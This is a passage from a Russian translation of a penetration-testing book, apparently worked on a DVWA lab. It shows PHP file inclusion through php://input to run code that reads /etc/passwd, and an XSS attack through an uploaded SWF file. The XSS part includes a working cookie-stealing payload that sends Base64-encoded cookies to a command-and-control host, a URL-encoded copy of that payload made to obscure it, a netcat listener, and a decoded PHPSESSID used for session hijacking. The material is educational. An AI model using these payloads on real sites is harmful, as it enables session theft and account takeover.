успешно.

Где-то внутри можно найти содержимое /etc/passwd. При таком подходе наблюдаются очевидные проблемы, связанные с обеспечением анонимности. Если файлы журнала тщательно проверяются средствами защиты, это выглядит нелепо.

Возможно, это грубый метод, но он показывает степень ущерба, который может нанести простая уязвимость,подверженная внедрению файлов.

Внедрение файла для удаленного выполнения кода

Подобно схеме file://, использованной в предыдущем примере, интерпретатор языка PHPтакже обеспечиваетдоступ к различным потокам ввода и вывода через схему php://. Это имеетсмысл,когда PHP используется в интерфейсе командной строки, и разработчик должен получить доступ к следующим стандартным потокам операционной системы: stdin, stderr, stdout – и даже к памяти. Стандартные потоки используются приложениями для обмена данными со средой, в которой они выполняются. Например, команда passwd в Linux будет использовать поток stdout для отображения информационных сообщений на терминал («Введите свой пароль»), stderr для отображения сообщений об ошибках («Неверный пароль») и stdin, чтобы запросить ввод данных пользователем для изменения пароля.

Традиционный способ парсинга входных данных, поступающих от веб- клиента,–эточтениеданныхсиспользованиемсуперглобальныхпеременных $_GET и$_POST.Переменная$_GET предоставляетданные,которыепередаются через URL-адрес,а переменная $_POST содержит аккуратно проанализированные данные тела POST.

Суперглобальная переменная – это переменная, которая всегда устанавливается интерпретатором языка PHP и доступна по всему приложению. $_GET и $_POST являются самыми популярными суперглобальными переменными, но есть и другие, в том числе $_SESSION, $_ENV и $_SERVER. Более подробную информацию можно найти в руководстве по PHP: http://php.net/manual/en/

language.variables.superglobals.php.

В случае с внедрением файлов схему php:// можно использовать вместе с потокомввода(онжеstdin)дляатакинаприложение.Вместодоступакресурсу по http:// или https:// можно внедритьв приложение поток php://input, чтобызаставитьPHPчитатьтелозапроса,какеслибыэтобылкод,ивыполнять его. Входные данные извлекаются интерпретатором из тела запроса.

и втеле запроса введем произвольный код PHP,интерпретатор на стороне сервера прочитает его и выполниттак, как показано ниже на рисунке.

Рис.5.10. Выполнение кода PHP с использованием локального внедрения файла

Запрос методом GET, показанный на предыдущем скриншоте слева, использует поток php://input в качестве параметра page, давая указание PHP выполнять код, поступающий из пользовательского ввода. В настройках вебприложения входные данные поступают из тела запроса. В этом случае тело содержит простой сценарий на языке PHP, который выполняет команду cat/ etc/passwd в системе. Ответ отражает вывод /etc/passwd, подтверждая, что удаленное выполнение кода прошло успешно.

Внешние подключения не выполняются, и контроль с помощью белого списка на базе сети удалось обойти. PHP – это многофункциональный язык программирования, и есть много способов сделать одно и то же. Обычно злоумышленникам это подходит,поскольку предоставляет больше возможностей для обхода управления,запутывания кода и утечки данных.Данное утверждение верно не только для PHP, но и для других языков.

наблюдаем за поведением браузера.

http://dvwa.app.internal/hackable/uploads/xssproject.swf?

js=alert(document.cookie);

Можно использовать этот URL-адрес для осуществления XSS-атак, направленных против пользователей уязвимого приложения. Вместо того чтобы использовать всплывающее окно (чтобы доказать, что уязвимость существует), мы могли бы добавить более полезный код на языке JavaScript, такой как ловушка от Browser Exploitation Framework (BeEF). Обсудим этот инструмент в главе 9 «Практические атаки на стороне клиента».

На рисунке показано, что код JavaScript успешно введен вредоносной про-

граммой (xssproject.swf).

Рис.5.12. XSS-атака после злоупотребления функцией загрузки файлов

Для более практического применения эксплойта можно попытаться незаметно украсть данные куки и, возможно, использовать значение PHPSESSID, чтобы выдать себя за пользователя в собственном сеансе браузера. Мы можем получить данные куки, закодировать их в формат Base64 с помощью функции JavaScriptbtoa() иотправитьнанашкомандно-контрольныйсервер.Кактоль- ко соберем данные куки,можем вызвать перенаправление на главную страницу приложения, чтобы не вызывать подозрений. Часть данных будет прозрачна для жертвы.

Эта полезная нагрузка будетзаписыватьновый HTML-код в объектную модель документа (DOM) с использованием объекта document. HTML-код – это

контрольный пункт. HTTP-запрос будет содержать куки-файлы жертвы в кодировке Base64 прямо в URL-адресе запроса, что позволит нам перехватывать эти данные удаленно. Последняя функция для перенаправления клиента на главную страницу '/' будетзапущена через 500 миллисекунд.Это сделанодля того,чтобы у iframe была возможность загрузить и украсть данные.

Код атаки будет выглядетьтак:

document.write("Loading...<iframe style='display:none;' src='//c2.spider.ml/"+btoa(document.cookie)+"'></iframe>"); setTimeout(function(){window.location.href='/';},500);

Предыдущий код должен быть сжат в одну строку,разделенную точкой с запятой, и, поскольку нам нужно использовать URL-адрес для внедрения этого кода, мы также должны закодировать символы URL-адреса, чтобы гарантировать отсутствие проблем при передаче.Для кодирования и маскировки полезной нагрузки можно использовать модуль Decoder из Burp.

Рис.5.13. URL-кодирование вредоносного кода JavaScript с использованием модуля Decoder

Все символы будут преобразованы в их шестнадцатеричный эквивалент с добавлением знака процента (%), чтобы запутать код атаки и обеспечить его успешное выполнение на стороне жертвы. URL-адрес, содержащий закодированную полезную нагрузку, будет выглядетьтак:

http://dvwa.app.internal/hackable/uploads/xssproject.swf?js=%64%6f

%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%4c%6f%61%64%69%6e%67%2e%2e

%2e%3c%69%66%72%61%6d%65%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79

%3a%6e%6f%6e%65%3b%27%20%73%72%63%3d%27%2f%2f%63%32%2e%73%70%69%64%65

%72%2e%6d%6c%2f%22%2b%62%74%6f%61%28%64%6f%63%75%6d%65%6e%74%2e%63%6f

%6f%6b%69%65%29%2b%22%27%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b%73%65

%64%6f%77%2e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%3d%27%2f%27%3b%7d

%2c%35%30%30%29%3b

Как только жертва перейдет по предыдущей вредоносной ссылке, мы увидим, что поступает запрос на c2.spider.ml, и получим закодированные значения куки-файлов из GET-запроса. Для этого можно настроить слушатель на порту 80 с помощью приложения netcat (nc).Netcat–это своего рода швейцарский армейский нож для злоумышленников, который может гораздо больше, чем быть просто сервером,но для наших целей этого вполне достаточно.

Можно вызватьдвоичный файл nc с помощью следующих опций: -l для запуска слушателя, -v для отображения подробной информации и -p для указания порта 80 в качестве порта для прослушивания.

root@spider-c2-1:~# nc -lvp 80 listening on [any] 80 ...

connect to [10.0.0.4] from 11.25.198.51 59197

Теперь,когда у нас есть сервер,готовый к входящим соединениям от нашей жертвы,мы можем начатьатаку и ждать,когда пользовательнажметна вредоносный URL-адрес.

GET /UEhQU0VTU0lEPXBhdGxrbms4bm5ndGgzcmFpNjJrYXYyc283OyBzZWN1cml0eT1oaWdo

HTTP/1.1

Host: c2.spider.ml Connection: keep-alive Upgrade-Insecure-Requests: 1 [...]

GET URL – это значение в кодировке Base64, содержащее похищенные данные куки. Можем подтвердить это, расшифровав содержимое с помощью команды Linux base64, используя ключ –d.

root@spider-c2-1:~# echo

"UEhQU0VTU0lEPXBhdGxrbms4bm5ndGgzcmFpNjJrYXYyc283OyBzZWN1cml0eT1oaWdo " | base64 -d

PHPSESSID=patlknk8nngth3rai62kav2so7; security=low

Получилось! Имея идентификатор сессии, мы можем выдать себя за жертву и захватить контроль над учетной записью.

Также можем попытаться загрузить HTMLили HTM-файлы и таким образом добиться того же, однако эти расширения, скорее всего, будут внесены в